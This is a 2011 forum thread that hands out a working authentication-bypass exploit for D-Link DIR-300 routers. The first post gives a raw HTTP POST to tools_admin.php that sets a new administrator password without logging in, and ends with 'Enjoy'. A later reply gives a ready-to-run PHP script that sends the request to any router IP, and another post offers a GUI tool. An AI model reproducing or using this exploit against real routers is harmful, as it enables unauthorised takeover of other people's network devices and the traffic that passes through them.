Vcoderz Community
We create websites that have it all, beauty & brains
Lebanon Web Design & Development - Coddict
 

Go Back   Vcoderz Community > Computer Zone > Computers & Information Technologies

Notices

Computers & Information Technologies Everything related to computers and internet.

Reply
 
Share Thread Tools Search this Thread
Old 02-09-2011   #1
Google

 
Google's Avatar
 
Last Online: 05-30-2013
Join Date: Jan 2008
Posts: 1,788
Thanks: 10,018
Thanked 1,100 Times in 651 Posts
Groans: 1
Groaned at 6 Times in 6 Posts
Default Change D-Link DIR-300 (and others) routers password

Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any
authorization by sending specially crafted http post request such as:

---cut here---

POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&logi n=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name= admin&admin_password1=uhOHahEh

---cut here---

Enjoy


__________________

Google is offline   Reply With Quote
Old 02-09-2011   #2
gachkar
Registered Member
 
gachkar's Avatar
 
Last Online: 04-10-2012
Join Date: May 2006
Posts: 16
Thanks: 0
Thanked 3 Times in 3 Posts
Groans: 0
Groaned at 0 Times in 0 Posts
Default

hey thanks for the post !
byut how to use it ? where to save it ? to what extension ?
gachkar is offline   Reply With Quote
Old 02-10-2011   #3
Google

 
Google's Avatar
 
Last Online: 05-30-2013
Join Date: Jan 2008
Posts: 1,788
Thanks: 10,018
Thanked 1,100 Times in 651 Posts
Groans: 1
Groaned at 6 Times in 6 Posts
Default

Quote:
Originally Posted by gachkar View Post
hey thanks for the post !
byut how to use it ? where to save it ? to what extension ?
That was the HTTP POST request. You can send it using any language like PHP, PERL, PYTHON... That's the PHP code:

Code:
<?php
if(sizeof($argv)!=4) {
   echo "Usage: php5 $argv[0] <router ip addres> <port>
   <admin password>\n";
   exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
   echo "- Error: could not connect (
   http://$argv[1]:$argv[2]/tools_admin.php).\n";
   exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"login.php")===true) {
   echo "- something goes wrong (check answer - answer.html) !\n";
   $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
   exit;
}
else
   echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
If you want, I will make an GUI executable file and post it here later.
__________________

Google is offline   Reply With Quote
Old 02-13-2011   #4
yaleil
Registered Member
 
yaleil's Avatar
 
Last Online: 04-28-2013
Join Date: Apr 2006
Posts: 357
Thanks: 4
Thanked 10 Times in 10 Posts
Groans: 0
Groaned at 0 Times in 0 Posts
Default

can you do that please?
yaleil is offline   Reply With Quote
Old 02-17-2011   #5
Google

 
Google's Avatar
 
Last Online: 05-30-2013
Join Date: Jan 2008
Posts: 1,788
Thanks: 10,018
Thanked 1,100 Times in 651 Posts
Groans: 1
Groaned at 6 Times in 6 Posts
Default

Quote:
Originally Posted by yaleil View Post
can you do that please?
Here it is. But don't pwn yourself
__________________

Google is offline   Reply With Quote
The Following User Says Thank You to Google For This Useful Post:
Reply

  Vcoderz Community > Computer Zone > Computers & Information Technologies

Tags
change, dir300, dlink, password, routers



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT +1. The time now is 04:04 AM.


Lebanon web design and development
Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
Ad Management plugin by RedTyger
Share